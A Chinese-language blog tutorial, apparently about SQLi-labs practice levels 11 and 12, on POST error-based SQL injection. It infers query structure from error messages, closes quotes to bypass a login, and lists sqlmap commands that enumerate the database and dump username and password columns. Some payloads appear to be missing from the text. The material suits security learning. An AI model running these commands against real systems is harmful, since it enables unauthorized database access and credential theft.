sql POST基于错误的注入
作者:互联网
这里面 需要用到的工具是 Burp Suite 这款 优秀的抓包工具 然后还有sqlmap 等等
抓包的教程 有很多 这里就不一一叙述了
我们先来看一下 11这个关卡
然后 这里 可以直接输入 看返回结果 比如
也可以 截取 数据包 然后用
来发送 其中呢 我们可以 通过报错信息来猜测闭合的信息
比如 我们输入了 是 admid\ 报错是 123456' limit 0,1 那么
我们可以 推测 这个的信息 是
select name,password from admin where name='xxxx' and password ='xxxx'
其中 我们的 \ 把 xxxx 后面的 '给转译成 正常的字符 那么 是由 password 第一个'来闭合的 那么 后面的 123456’自然的就报错了 那么 这里我们就有很多要写的东西了
我们直接 这样
构造了一个闭合 就直接 可以显示出来了 正确的
然后我们看 12
这里的报错是 “123456\” 那么
我们可以 构造闭合
登陆成功@!!!
然后就是 就 用sqlmap 跑程序
首先把数据包复制下来
;
然后 用sqlmap 跑一下
py -2 sqlmap.py -r C:\Users\Lenovo\Desktop\flag.txt -p uname --technique E --current-db --batch
py -2 sqlmap.py -r C:\Users\Lenovo\Desktop\flag.txt -p uname --technique E -D security --tables --batch
py -2 sqlmap.py -r C:\Users\Lenovo\Desktop\flag.txt -p uname --technique E -T users --columns --batch
py -2 sqlmap.py -r C:\Users\Lenovo\Desktop\flag.txt -p uname --technique E -T users -C'username,password' --dump --batch
标签:sqlmap,基于,technique,py,Desktop,uname,报错,sql,POST 来源: https://blog.csdn.net/qq_41071646/article/details/87876013